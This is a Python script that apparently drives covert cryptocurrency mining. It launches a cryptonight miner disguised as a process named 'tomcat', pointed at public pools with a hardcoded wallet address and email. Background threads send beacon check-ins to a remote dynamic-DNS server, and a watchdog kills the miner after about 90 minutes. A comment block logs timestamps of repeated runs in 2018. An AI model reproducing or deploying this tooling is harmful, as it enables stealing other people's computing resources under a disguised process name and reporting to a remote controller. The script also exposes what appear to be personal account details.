import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:38:06.230081
#2018-02-17 16:24:05.313246
#2018-02-17 18:11:08.011239
#2018-02-17 19:59:03.672316
#2018-02-17 21:48:04.755653
#2018-02-17 23:33:04.826192
#2018-02-18 01:22:05.641988
#2018-02-18 03:09:04.752951
#2018-02-18 04:58:01.954497
#2018-02-18 06:51:06.059438
#2018-02-18 08:40:04.733129
#2018-02-18 10:26:05.834712
#2018-02-18 12:12:01.441046
#2018-02-18 13:58:06.330628
#2018-02-18 15:48:06.791120
#2018-02-18 17:37:04.354511
#2018-02-18 19:24:07.507442
#2018-02-18 21:09:01.276080
#2018-02-18 22:55:07.686969
#2018-02-19 00:43:05.902166
#2018-02-19 02:29:03.323537
#2018-02-19 04:16:01.796415
#2018-02-19 05:59:05.519100
#2018-02-19 07:48:07.195734
#2018-02-19 09:38:07.820866
#2018-02-19 11:28:07.800953
#2018-02-19 13:16:01.323701
#2018-02-19 15:03:08.134342
#2018-02-19 16:50:09.984334
#2018-02-19 18:39:07.528221
#2018-02-19 20:27:05.833427
#2018-02-19 22:15:01.547568
#2018-02-20 00:01:06.974697
#2018-02-20 01:48:06.778336
#2018-02-20 03:36:05.818274
#2018-02-20 05:22:03.987353
#2018-02-20 07:06:05.142544
#2018-02-20 08:51:06.134219
#2018-02-20 10:35:08.550496
#2018-02-20 12:21:05.144950
#2018-02-20 14:08:08.243512
#2018-02-20 15:53:04.718784
#2018-02-20 17:40:13.531913
#2018-02-20 19:28:07.750055
#2018-02-20 21:16:04.117160
#2018-02-20 23:00:02.164572
#2018-02-21 00:45:07.008743
#2018-02-21 02:31:04.226409
#2018-02-21 04:18:01.331266
#2018-02-21 06:04:05.366548
#2018-02-21 07:51:08.243365
#2018-02-21 09:38:01.429415
#2018-02-21 11:26:01.938003
#2018-02-21 13:14:10.666931
#2018-02-21 15:00:06.546866
#2018-02-21 16:48:16.546716
#2018-02-21 18:38:01.384938
#2018-02-21 20:23:01.245839
#2018-02-21 22:12:07.254233
#2018-02-22 00:02:02.187834
#2018-02-22 01:49:04.796542
#2018-02-22 03:38:05.578904
#2018-02-22 05:25:03.971027
#2018-02-22 07:10:07.517491
#2018-02-22 08:56:08.756018
#2018-02-22 10:43:08.531245
#2018-02-22 12:29:06.714522
#2018-02-22 14:13:01.633883
#2018-02-22 16:01:09.950224
#2018-02-22 17:47:05.985472
#2018-02-22 19:34:05.061043
#2018-02-22 21:26:08.545543
#2018-02-22 23:13:08.205456
#2018-02-23 00:58:11.394186
#2018-02-23 02:47:04.848377
#2018-02-23 04:35:02.842379
#2018-02-23 06:21:05.447008
#2018-02-23 08:07:06.769190
#2018-02-23 10:20:06.571091
#2018-02-23 12:12:05.875703
#2018-02-23 13:59:08.141994
#2018-02-23 15:51:06.123356
#2018-02-23 17:36:02.120204
#2018-02-23 19:22:07.331352
#2018-02-23 21:06:04.828756
#2018-02-23 22:51:06.340710
#2018-02-24 00:38:06.576330
#2018-02-24 02:28:01.800553
#2018-02-24 04:19:05.773505
#2018-02-24 06:07:01.972684
#2018-02-24 07:54:01.642030
#2018-02-24 09:38:06.448998
#2018-02-24 11:33:07.813946
#2018-02-24 13:23:07.519098
#2018-02-24 15:12:07.710179
#2018-02-24 17:01:05.148199
#2018-02-24 18:49:01.926634
#2018-02-24 20:39:03.930277
#2018-02-24 22:46:04.122530
#2018-02-25 02:07:06.120520
#2018-02-25 05:52:05.690705
#2018-02-25 11:37:07.799850